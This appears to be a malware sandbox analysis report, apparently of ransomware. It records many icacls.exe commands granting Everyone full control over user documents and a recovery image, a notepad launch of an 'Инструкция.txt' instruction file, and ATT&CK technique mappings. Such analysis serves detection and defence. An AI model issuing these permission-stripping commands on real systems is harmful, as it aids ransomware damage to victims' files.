  "icacls.exe" C:\Users\Admin\Downloads\ResumeSplit.vstm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:332
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\SearchReceive.jfif /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1176
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\StepGet.dib /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2172
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\TraceRemove.aifc /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2148
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UninstallMount.ppsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2224
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UnprotectNew.vsw /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1708
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UnregisterConnect.ps1 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2184
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\WaitDisconnect.potm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2332
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\WriteSearch.vstm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1620
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Are.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:580
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\AssertShow.ppt /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1124
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ConvertCompare.vst /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2336
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ConvertFromWrite.vstx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2364
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\DebugGroup.mhtml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1064
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\EnterInvoke.wps /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2328
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ExportEnable.vssm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1560
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Files.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2000
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\FormatGrant.ods /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1632
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\FormatSubmit.pub /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:460
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\FormatUninstall.wps /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:748
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ImportUnregister.htm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2404
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\MergeRename.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2444
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\MountApprove.htm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2416
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Opened.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1772
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ProtectImport.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2532
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ProtectResolve.ppsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2504
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ReceiveBlock.mht /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2496
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ReceiveResolve.wps /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2628
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Recently.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1016
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\RemoveUndo.mht /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2512
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\RequestReset.vstm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2560
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ResetPing.odt /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2620
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SendDismount.vst /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2588
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SplitUndo.dotm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2668
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\StartSet.vdw /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2748
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SubmitInvoke.ppsx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2704
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SubmitWatch.docm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2200
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\These.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2664
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\TraceSelect.ppsx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2760
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UnlockSet.vdx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2720
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UseWait.potx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2808
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\WatchAdd.vssx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2856
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\WriteRegister.vsx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2840
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\AddInstall.potx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2896
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\CompressUnregister.3g2 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2908
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ConfirmStop.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2940
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ConvertFromInstall.search-ms /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2964
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\DenyPop.xps /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3028
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ExitNew.pot /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3056
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\OptimizeSync.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1996
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\PublishRemove.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:3024
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ReadEnable.m4a /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2084
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ReceiveUninstall.vst /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:656
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\RequestConvert.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1400
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ResizeMeasure.sql /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:976
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ResolveRequest.ps1xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:616
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ResolveResume.tif /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2076
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ResolveShow.potx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1968
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\RestoreApprove.3gp /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2276
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\SaveConnect.rtf /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:368
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ShowMerge.7z /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1236
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\UpdateUnprotect.htm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2168
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\WaitSearch.xsl /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2340
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Contacts\Admin.contact /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2308
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Recovery\4537d782-9a0d-11eb-a52e-c2ebb310cb62\Winre.wim /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:604
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\Инструкция.txt
  2⤵
  PID:2100
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:1304

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/380-65-0x0000000076A81000-0x0000000076A83000-memory.dmp

Filesize
8KB

Download
memory/380-75-0x0000000002710000-0x0000000002711000-memory.dmp

Filesize
4KB

Download
memory/380-74-0x0000000002160000-0x0000000002DAA000-memory.dmp

Filesize
12.3MB

Download
memory/380-72-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/380-68-0x0000000000560000-0x0000000000561000-memory.dmp

Filesize
4KB

Download
memory/572-112-0x0000000006200000-0x0000000006201000-memory.dmp

Filesize
4KB

Download
memory/572-79-0x0000000006000000-0x0000000006001000-memory.dmp

Filesize
4KB

Download
memory/572-137-0x0000000006320000-0x0000000006321000-memory.dmp

Filesize
4KB

Download
memory/572-70-0x00000000047A0000-0x00000000047A1000-memory.dmp

Filesize
4KB

Download
memory/572-86-0x0000000006150000-0x0000000006151000-memory.dmp

Filesize
4KB

Download
memory/572-84-0x0000000006060000-0x0000000006061000-memory.dmp

Filesize
4KB

Download
memory/572-138-0x0000000006330000-0x0000000006331000-memory.dmp

Filesize
4KB

Download
memory/572-85-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/572-93-0x0000000006260000-0x0000000006261000-memory.dmp

Filesize
4KB

Download
memory/1304-226-0x0000000004150000-0x0000000004151000-memory.dmp

Filesize
4KB

Download
memory/1852-60-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/1852-62-0x00000000043E0000-0x00000000043E1000-memory.dmp

Filesize
4KB

Download
memory/2996-217-0x0000000002380000-0x0000000002FCA000-memory.dmp

Filesize
12.3MB

Download
memory/2996-218-0x0000000002380000-0x0000000002FCA000-memory.dmp

Filesize
12.3MB

Download